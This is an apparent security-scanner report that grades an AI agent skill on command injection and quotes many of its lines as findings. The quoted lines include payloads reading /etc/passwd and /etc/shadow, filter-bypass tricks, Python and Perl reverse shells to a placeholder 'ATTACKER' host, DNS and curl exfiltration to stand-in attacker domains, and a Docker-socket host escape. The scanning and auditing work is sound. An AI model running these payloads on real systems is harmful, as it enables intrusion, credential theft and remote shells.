cmdi-command-injection
github.com/yaklang/hack-skills
Scanned Thu, 28 May 2026 17:26:03 GMT
Scan ID crawl-xqbnqe4g7f2mcp034tyvfm19 · 5ms
Grade: C · Score: 55 / 100
Verdict: Proceed with caution

43 high-severity findings.

This skill reads protected filesystem locations ($IFS) plus 52 other issues listed below.

0 critical · 43 high · 10 medium · 41 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 43 high-severity findings (3+ HIGHs → C).

0 CRIT · 43 HIGH · 10 MED · 0 LOW
To reach a higher grade
  • B (target score 75): resolve 41 of 43 HIGH (cap is 2) + 5 of 10 MED (cap is 5).
  • A (target score 95): resolve all 43 HIGH + 8 of 10 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 28 · CWE-552
    26
    27  ```text
    28  cat$IFS/etc/passwd    ← sensitive path — credential-exfiltration vector
    29  {cat,/etc/passwd}
    30  %0aid
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 29 · CWE-552
    27  ```text
    28  cat$IFS/etc/passwd
    29  {cat,/etc/passwd}    ← sensitive path — credential-exfiltration vector
    30  %0aid
    31  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 50 · CWE-552
    48  | `>` | Redirect stdout to file | `cmd > /tmp/out` |
    49  | `>>` | Append to file | `cmd >> /tmp/out` |
    50  | `<` | Read file as stdin | `cmd < /etc/passwd` |    ← sensitive path — credential-exfiltration vector
    51  | `%0a` | Newline character (URL-encoded) | `cmd%0awhoami` |
    52  | `%0d%0a` | CRLF | Multi-command injection |
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 62 · CWE-552
    60  $dir = $_GET['dir'];
    61  $out = shell_exec("du -h /var/www/html/" . $dir);
    62  // Inject: dir=../ ; cat /etc/passwd    ← sensitive path — credential-exfiltration vector
    63  // Inject: dir=../ $(cat /etc/passwd)
    64
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 63 · CWE-552
    61  $out = shell_exec("du -h /var/www/html/" . $dir);
    62  // Inject: dir=../ ; cat /etc/passwd
    63  // Inject: dir=../ $(cat /etc/passwd)    ← sensitive path — credential-exfiltration vector
    64
    65  exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd"
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 65 · CWE-552
    63  // Inject: dir=../ $(cat /etc/passwd)
    64
    65  exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd"    ← sensitive path — credential-exfiltration vector
    66  system("convert " . $file); // ImageMagick RCE
    67  passthru("nslookup " . $host); // $host = "x.com; id"
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 89 · CWE-552
    87  $command = "du -h /var/www/html" . $dir;
    88  system($command);
    89  // Inject dir field: | cat /etc/passwd    ← sensitive path — credential-exfiltration vector
    90  ```
    91
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 177 · CWE-552
    175  ```bash
    176  cat /var/log/INJECT
    177  # Inject: ../../../etc/passwd (path traversal)    ← sensitive path — credential-exfiltration vector
    178  # Inject: access.log; id (command injection)
    179  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 190 · CWE-552
    188  ; whoami # user name
    189  ; uname -a # OS info
    190  ; cat /etc/passwd # user list    ← sensitive path — credential-exfiltration vector
    191  ; cat /etc/shadow # password hashes (if root)
    192  ; ls /home/ # home directories
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 191 · CWE-552
    189  ; uname -a # OS info
    190  ; cat /etc/passwd # user list
    191  ; cat /etc/shadow # password hashes (if root)    ← sensitive path — credential-exfiltration vector
    192  ; ls /home/ # home directories
    193  ; env # environment variables (DB creds, API keys!)
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 232 · CWE-552
    230  ### Space Alternatives (when space is filtered)
    231  ```bash
    232  cat</etc/passwd # < instead of space    ← sensitive path — credential-exfiltration vector
    233  {cat,/etc/passwd} # brace expansion
    234  cat$IFS/etc/passwd # $IFS variable (field separator)
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 233 · CWE-552
    231  ```bash
    232  cat</etc/passwd # < instead of space
    233  {cat,/etc/passwd} # brace expansion    ← sensitive path — credential-exfiltration vector
    234  cat$IFS/etc/passwd # $IFS variable (field separator)
    235  X=$'\x20'&&cat${X}/etc/passwd # hex encoded space
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 234 · CWE-552
    232  cat</etc/passwd # < instead of space
    233  {cat,/etc/passwd} # brace expansion
    234  cat$IFS/etc/passwd # $IFS variable (field separator)    ← sensitive path — credential-exfiltration vector
    235  X=$'\x20'&&cat${X}/etc/passwd # hex encoded space
    236  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 235 · CWE-552
    233  {cat,/etc/passwd} # brace expansion
    234  cat$IFS/etc/passwd # $IFS variable (field separator)
    235  X=$'\x20'&&cat${X}/etc/passwd # hex encoded space    ← sensitive path — credential-exfiltration vector
    236  ```
    237
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 246 · CWE-552
    244  ### Keyword Bypass via Variable Assembly
    245  ```bash
    246  a=c;b=at;c=/etc/passwd; $a$b $c # 'cat /etc/passwd'    ← sensitive path — credential-exfiltration vector
    247  c=at;ca$c /etc/passwd # cat
    248  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 247 · CWE-552
    245  ```bash
    246  a=c;b=at;c=/etc/passwd; $a$b $c # 'cat /etc/passwd'
    247  c=at;ca$c /etc/passwd # cat    ← sensitive path — credential-exfiltration vector
    248  ```
    249
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 303 · CWE-552
    301  ```bash
    302  # Use ? and * to bypass keyword filters:
    303  /???/??t /???/p??s?? # /bin/cat /etc/passwd    ← sensitive path — credential-exfiltration vector
    304  /???/???/????2 *.php # /usr/bin/find2 *.php (approximate)
    305
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 314 · CWE-552
    312
    313  ```bash
    314  tac /etc/passwd # reverse cat    ← sensitive path — credential-exfiltration vector
    315  nl /etc/passwd # numbered lines
    316  head /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 315 · CWE-552
    313  ```bash
    314  tac /etc/passwd # reverse cat
    315  nl /etc/passwd # numbered lines    ← sensitive path — credential-exfiltration vector
    316  head /etc/passwd
    317  tail /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 316 · CWE-552
    314  tac /etc/passwd # reverse cat
    315  nl /etc/passwd # numbered lines
    316  head /etc/passwd    ← sensitive path — credential-exfiltration vector
    317  tail /etc/passwd
    318  more /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 317 · CWE-552
    315  nl /etc/passwd # numbered lines
    316  head /etc/passwd
    317  tail /etc/passwd    ← sensitive path — credential-exfiltration vector
    318  more /etc/passwd
    319  less /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 318 · CWE-552
    316  head /etc/passwd
    317  tail /etc/passwd
    318  more /etc/passwd    ← sensitive path — credential-exfiltration vector
    319  less /etc/passwd
    320  sort /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 319 · CWE-552
    317  tail /etc/passwd
    318  more /etc/passwd
    319  less /etc/passwd    ← sensitive path — credential-exfiltration vector
    320  sort /etc/passwd
    321  uniq /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 320 · CWE-552
    318  more /etc/passwd
    319  less /etc/passwd
    320  sort /etc/passwd    ← sensitive path — credential-exfiltration vector
    321  uniq /etc/passwd
    322  rev /etc/passwd | rev
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 321 · CWE-552
    319  less /etc/passwd
    320  sort /etc/passwd
    321  uniq /etc/passwd    ← sensitive path — credential-exfiltration vector
    322  rev /etc/passwd | rev
    323  xxd /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 322 · CWE-552
    320  sort /etc/passwd
    321  uniq /etc/passwd
    322  rev /etc/passwd | rev    ← sensitive path — credential-exfiltration vector
    323  xxd /etc/passwd
    324  strings /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 323 · CWE-552
    321  uniq /etc/passwd
    322  rev /etc/passwd | rev
    323  xxd /etc/passwd    ← sensitive path — credential-exfiltration vector
    324  strings /etc/passwd
    325  od -c /etc/passwd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 324 · CWE-552
    322  rev /etc/passwd | rev
    323  xxd /etc/passwd
    324  strings /etc/passwd    ← sensitive path — credential-exfiltration vector
    325  od -c /etc/passwd
    326  base64 /etc/passwd # then decode offline
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 325 · CWE-552
    323  xxd /etc/passwd
    324  strings /etc/passwd
    325  od -c /etc/passwd    ← sensitive path — credential-exfiltration vector
    326  base64 /etc/passwd # then decode offline
    327  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 326 · CWE-552
    324  strings /etc/passwd
    325  od -c /etc/passwd
    326  base64 /etc/passwd # then decode offline    ← sensitive path — credential-exfiltration vector
    327  ```
    328
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 366 · CWE-552
    364  ```bash
    365  # $IFS (Internal Field Separator) as space:
    366  cat$IFS/etc/passwd    ← sensitive path — credential-exfiltration vector
    367  cat${IFS}/etc/passwd
    368
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 367 · CWE-552
    365  # $IFS (Internal Field Separator) as space:
    366  cat$IFS/etc/passwd
    367  cat${IFS}/etc/passwd    ← sensitive path — credential-exfiltration vector
    368
    369  # Unset variables expand to empty:
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 370 · CWE-552
    368
    369  # Unset variables expand to empty:
    370  c${x}at /etc/passwd # $x is unset → "cat"    ← sensitive path — credential-exfiltration vector
    371  ```
    372
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 464 · CWE-552
    462  #EXT-X-MEDIA-SEQUENCE:0
    463  #EXTINF:10.0,
    464  concat:http://attacker.com/header.txt|file:///etc/passwd    ← sensitive path — credential-exfiltration vector
    465  #EXT-X-ENDLIST
    466
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 489 · CWE-552
    487  # Classic injection point in network diagnostic features:
    488  # Input: 127.0.0.1; id
    489  # Input: 127.0.0.1 && cat /etc/passwd    ← sensitive path — credential-exfiltration vector
    490  # Input: `id`.attacker.com (DNS exfil via backtick)
    491  # These features directly call OS commands with user input
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 565 · CWE-552
    563  | Target | Time delay | DNS exfil | File read |
    564  |--------|-----------|-----------|-----------|
    565  | Linux/macOS | `sleep 5` | `nslookup $(whoami).atk.com` | `cat /etc/passwd` |    ← sensitive path — credential-exfiltration vector
    566  | cmd.exe | `timeout /T 5 /NOBREAK` | `nslookup %USERNAME%.atk.com` | `type C:\Windows\win.ini` |
    567  | PowerShell | `Start-Sleep 5` | `nslookup $(whoami).atk.com` | `Get-Content C:\Windows\win.ini` |
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 594 · CWE-552
    592
    593  # Injection via user input in command
    594  USER_INPUT='"; cat /etc/passwd; echo "'    ← sensitive path — credential-exfiltration vector
    595  → kubectl exec pod -- /bin/sh -c "echo ""; cat /etc/passwd; echo """
    596  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 595 · CWE-552
    593  # Injection via user input in command
    594  USER_INPUT='"; cat /etc/passwd; echo "'
    595  → kubectl exec pod -- /bin/sh -c "echo ""; cat /etc/passwd; echo """    ← sensitive path — credential-exfiltration vector
    596  ```
    597
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 609 · CWE-552
    607
    608  # Injection via command argument
    609  COMMAND="status; cat /etc/shadow"    ← sensitive path — credential-exfiltration vector
    610  → docker exec container /bin/sh -c "status; cat /etc/shadow"
    611  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 610 · CWE-552
    608  # Injection via command argument
    609  COMMAND="status; cat /etc/shadow"
    610  → docker exec container /bin/sh -c "status; cat /etc/shadow"    ← sensitive path — credential-exfiltration vector
    611  ```
    612
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 618 · CWE-552
    616  # Docker socket exposed (2375/2376 or /var/run/docker.sock)
    617  POST /containers/create HTTP/1.1
    618  {"Image":"alpine","Cmd":["/bin/sh","-c","cat /host/etc/shadow"],"Binds":["/:/host"]}    ← sensitive path — credential-exfiltration vector
    619
    620  # Then start + exec
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 622 · CWE-552
    620  # Then start + exec
    621  POST /containers/{id}/start
    622  POST /containers/{id}/exec {"Cmd":["cat","/host/etc/shadow"]}    ← sensitive path — credential-exfiltration vector
    623
    624  # Kubernetes API (6443/8443 unauthenticated)
high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 652 · CWE-552
    650  | `ENV` | Same as BASH_ENV for POSIX `sh` | `ENV=/tmp/evil.sh` |
    651  | `PROMPT_COMMAND` | Executed before each interactive prompt | `PROMPT_COMMAND="curl http://atk.com/$(whoami)"` |
    652  | `PS1` | Prompt string, supports `$()` expansion in bash | `PS1='$(cat /etc/passwd > /tmp/out) \$ '` |    ← sensitive path — credential-exfiltration vector
    653  | `PYTHONSTARTUP` | Python script executed on interpreter startup | Inject path to malicious `.py` file |
    654  | `PERL5OPT` | Options passed to every Perl invocation | `PERL5OPT='-Mbase;system("id")'` |
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 65 · CWE-78
    63  // Inject: dir=../ $(cat /etc/passwd)
    64
    65  exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd"    ← spawns a subprocess outside declared capabilities
    66  system("convert " . $file); // ImageMagick RCE
    67  passthru("nslookup " . $host); // $host = "x.com; id"
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 73 · CWE-78
    71  ```python
    72  import os
    73  os.system("curl " + url) # url = "x.com; id"    ← spawns a subprocess outside declared capabilities
    74  subprocess.call("ls " + path, shell=True) # shell=True is the key vulnerability
    75  os.popen("ping " + host)
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 74 · CWE-78
    72  import os
    73  os.system("curl " + url) # url = "x.com; id"
    74  subprocess.call("ls " + path, shell=True) # shell=True is the key vulnerability    ← spawns a subprocess outside declared capabilities
    75  os.popen("ping " + host)
    76  ```
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 80 · CWE-78
    78  ### Node.js
    79  ```javascript
    80  const { exec } = require('child_process');    ← spawns a subprocess outside declared capabilities
    81  exec('ping ' + req.query.host, ...); // host = "x.com; id"
    82  ```
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 81 · CWE-78
    79  ```javascript
    80  const { exec } = require('child_process');
    81  exec('ping ' + req.query.host, ...); // host = "x.com; id"    ← spawns a subprocess outside declared capabilities
    82  ```
    83
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 207 · CWE-78
    205
    206  # Python:
    207  ; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'    ← spawns a subprocess outside declared capabilities
    208
    209  # Netcat (with -e):
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 216 · CWE-78
    214
    215  # Perl:
    216  ; perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'    ← spawns a subprocess outside declared capabilities
    217  ```
    218
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 377 · CWE-78
    375  ## 10. PHP disable_functions BYPASS PATHS
    376
    377  When `system()`, `exec()`, `shell_exec()`, `passthru()`, `popen()`, `proc_open()` are all disabled:    ← spawns a subprocess outside declared capabilities
    378
    379  ### Path 1: LD_PRELOAD + mail()/putenv()
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 478 · CWE-78
    476  "script_fields": {
    477    "cmd": {
    478      "script": "Runtime rt = Runtime.getRuntime(); rt.exec('id')"    ← spawns a subprocess outside declared capabilities
    479    }
    480  }
med
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest
skillox.io/r/crawl-xqbnqe4g7f2mcp034tyvfm19